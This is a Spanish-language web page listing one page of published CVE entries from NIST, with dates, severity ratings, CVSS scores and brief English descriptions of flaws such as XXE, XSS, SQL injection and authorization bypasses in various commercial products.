Vulnerabilidades CVE

A continuación la lista de las últimas vulnerabilidades publicadas por el instituto NIST:

Borrar filtros
CVE ID Publicado Severidad CVSS Descripción
CVE-2023-28152 2023-03-24 MEDIUM 5.3 An issue was discovered in Independentsoft JWord before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.
CVE-2023-26098 2023-04-25 HIGH 8.2 An issue was discovered in the Open Document feature in Telindus Apsal 3.14.2022.235 b. An attacker may upload a crafted file to execute arbitrary code.
CVE-2023-26099 2023-04-24 MEDIUM 4.4 An issue was discovered in Telindus Apsal 3.14.2022.235 b. The consultation permission is insecure.
CVE-2023-26097 2023-04-24 HIGH 8.4 An issue was discovered in Telindus Apsal 3.14.2022.235 b. Unauthorized actions that could modify the application behaviour may not be blocked.
CVE-2023-28150 2023-03-24 MEDIUM 5.3 An issue was discovered in Independentsoft JODF before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.
CVE-2022-45167 2023-01-10 MEDIUM 4.3 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to access the profile information of all connected users.
CVE-2022-45166 2023-01-10 MEDIUM 6.5 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a set of user-controlled parameters that are used to act on the…
CVE-2022-45165 2023-01-10 MEDIUM 6.5 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It…
CVE-2022-45164 2023-01-10 MEDIUM 4.3 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to cancel (delete) a booking, created by someone else…
CVE-2022-38482 2023-01-10 MEDIUM 4.3 A link-manipulation issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP4.
CVE-2022-38481 2023-01-10 MEDIUM 6.1 An issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP2. The application is prone to reflected Cross-site Scripting (XSS) in several features.
CVE-2022-37028 2022-09-27 MEDIUM 5.4 ISAMS 22.2.3.2 is prone to stored Cross-site Scripting (XSS) attack on the title field for groups, allowing an attacker to store a JavaScript payload that will be executed…
CVE-2022-36443 2023-01-10 HIGH 7.8 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. The device allows the administrator to lock some communication channels (wireless and SD card) but it is still…
CVE-2022-36442 2023-01-10 MEDIUM 5.5 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. By using the embedded Google Chrome application, it is possible to install an unauthorized application via a downloaded…
CVE-2022-36441 2023-01-10 HIGH 7.1 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. The Gboard used by different applications can be used to launch and use several other applications that are…
CVE-2022-34910 2023-02-27 MEDIUM 4.1 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It uses a local database to store data and accounts. However, the password is…
CVE-2022-34909 2023-02-27 HIGH 7.7 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It allows SQL Injection, by which an attacker can bypass authentication and retrieve data…
CVE-2022-34908 2023-02-27 HIGH 8.2 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It possesses an authentication mechanism; however, some features do not require any token or…
CVE-2022-30332 2023-01-10 MEDIUM 5.3 In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with…
CVE-2022-29931 2022-06-25 MEDIUM 6.1 The administration interface of the Raytion Custom Security Manager (Raytion CSM) in Version 7.2.0 allows reflected Cross-site Scripting (XSS).
CVE-2022-24967 2022-06-02 MEDIUM 6.5 Black Rainbow NIMBUS before 3.7.0 allows stored Cross-site Scripting (XSS).
CVE-2022-24447 2022-03-02 MEDIUM 6.5 An issue was discovered in Zoho ManageEngine Key Manager Plus before 6200. A service exposed by the application allows a user, with the level Operator, to access stored…
CVE-2022-24446 2022-03-01 MEDIUM 4.3 An issue was discovered in Zoho ManageEngine Key Manager Plus 6.1.6. A user, with the level Operator, can see all SSH servers (and user information) even if no…
CVE-2021-44035 2021-12-17 MEDIUM 4.4 Wolters Kluwer TeamMate AM 12.4 Update 1 mishandles attachment uploads, such that an authenticated user may download and execute malicious files.
CVE-2021-43978 2021-12-08 HIGH 7.1 Allegro WIndows 3.3.4152.0, embeds software administrator database credentials into its binary files, which allows users to access and modify data using the same credentials.
CVE-2021-42110 2021-12-08 HIGH 7.1 An issue was discovered in Allegro Windows (formerly Popsy Windows) before 3.3.4156.1. A standard user can escalate privileges to SYSTEM if the FTP module is installed, because of…
CVE-2021-42111 2021-11-10 MEDIUM 5.5 An issue was discovered in the RCDevs OpenOTP app 1.4.13 and 1.4.14 for iOS. If it is installed on a jailbroken device, it is possible to retrieve the…
CVE-2021-41320 2021-10-15 MEDIUM 5.5 A technical user has hardcoded credentials in Wallstreet Suite TRM 7.4.83 (64-bit edition) with higher privilege than the average authenticated user. NOTE: the vendor disputes this because the…
CVE-2021-38618 2021-10-04 HIGH 7.4 In GFOS Workforce Management 4.8.272.1, the login page of application is prone to authentication bypass, allowing anyone (who knows a user's credentials except the password) to get access…
CVE-2021-38617 2021-09-07 HIGH 8.8 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/ user creation endpoint allows a standard user to create a super user account with a defined…
CVE-2021-38616 2021-09-07 HIGH 7.6 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/{user-guid}/ user edition endpoint could permit any logged-in user to increase their own permissions via a user_permissions…
CVE-2021-38615 2021-09-07 MEDIUM 6.3 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/sso/config/ SSO configuration endpoint allows any logged-in user (guest, standard, or admin) to view and modify information.
CVE-2021-32018 2021-08-03 HIGH 8.5 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. The JUMP SOAP API was vulnerable to arbitrary file reading due to an improper limitation of file loading on the…
CVE-2021-31399 2021-08-13 MEDIUM 4.6 On 2N Access Unit 2.0 2.31.0.40.5 devices, an attacker can pose as the web relay for a man-in-the-middle attack.
CVE-2021-32016 2021-08-03 CRITICAL 9.9 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the writing of arbitrary files to a user-controlled location on the remote filesystem (with user-controlled…
CVE-2021-32017 2021-08-03 CRITICAL 9.9 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the listing of the content of the remote file system. This can be used to…
CVE-2021-31531 2021-06-29 CRITICAL 9.8 Zoho ManageEngine ServiceDesk Plus MSP before 10521 is vulnerable to Server-Side Request Forgery (SSRF).
CVE-2021-31530 2021-06-29 HIGH 7.5 Zoho ManageEngine ServiceDesk Plus MSP before 10522 is vulnerable to Information Disclosure.
CVE-2021-31777 2021-04-28 MEDIUM 4.9 The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.
CVE-2021-31160 2021-06-29 HIGH 7.5 Zoho ManageEngine ServiceDesk Plus MSP before 10521 allows an attacker to access internal data.
CVE-2020-28918 2021-02-16 MEDIUM 5.3 DualShield 5.9.8.0821 allows username enumeration on its login form. A valid username results in prompting for the password, whereas an invalid one will produce an "unknown username" error…
CVE-2020-28406 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access details about jobs he should not have access to via…
CVE-2020-28405 2021-01-29 HIGH 8.8 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to change the privileges of any user of the application. This can…
CVE-2020-28404 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access the Billing page without the appropriate privileges.
CVE-2020-28403 2021-01-29 HIGH 8.0 A Cross-Site Request Forgery (CSRF) vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an attacker to change the privileges of any user of the application. This…
CVE-2020-8422 2020-01-31 MEDIUM 4.3 An authorization issue was discovered in the Credential Manager feature in Zoho ManageEngine Remote Access Plus before 10.0.450. A user with the Guest role can extract the collection…
CVE-2020-28402 2021-01-29 MEDIUM 5.4 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access Launcher Configuration Panel.
CVE-2020-28401 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access WIP details about jobs he should not have access to.
CVE-2020-26167 2020-11-04 CRITICAL 9.8 In FUEL CMS 11.4.12 and before, the page preview feature allows an anonymous user to take complete ownership of any account including an administrator one.
CVE-2020-26546 2020-10-12 HIGH 7.5 An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products…
« Anterior Página 1128 de 4308 Siguiente »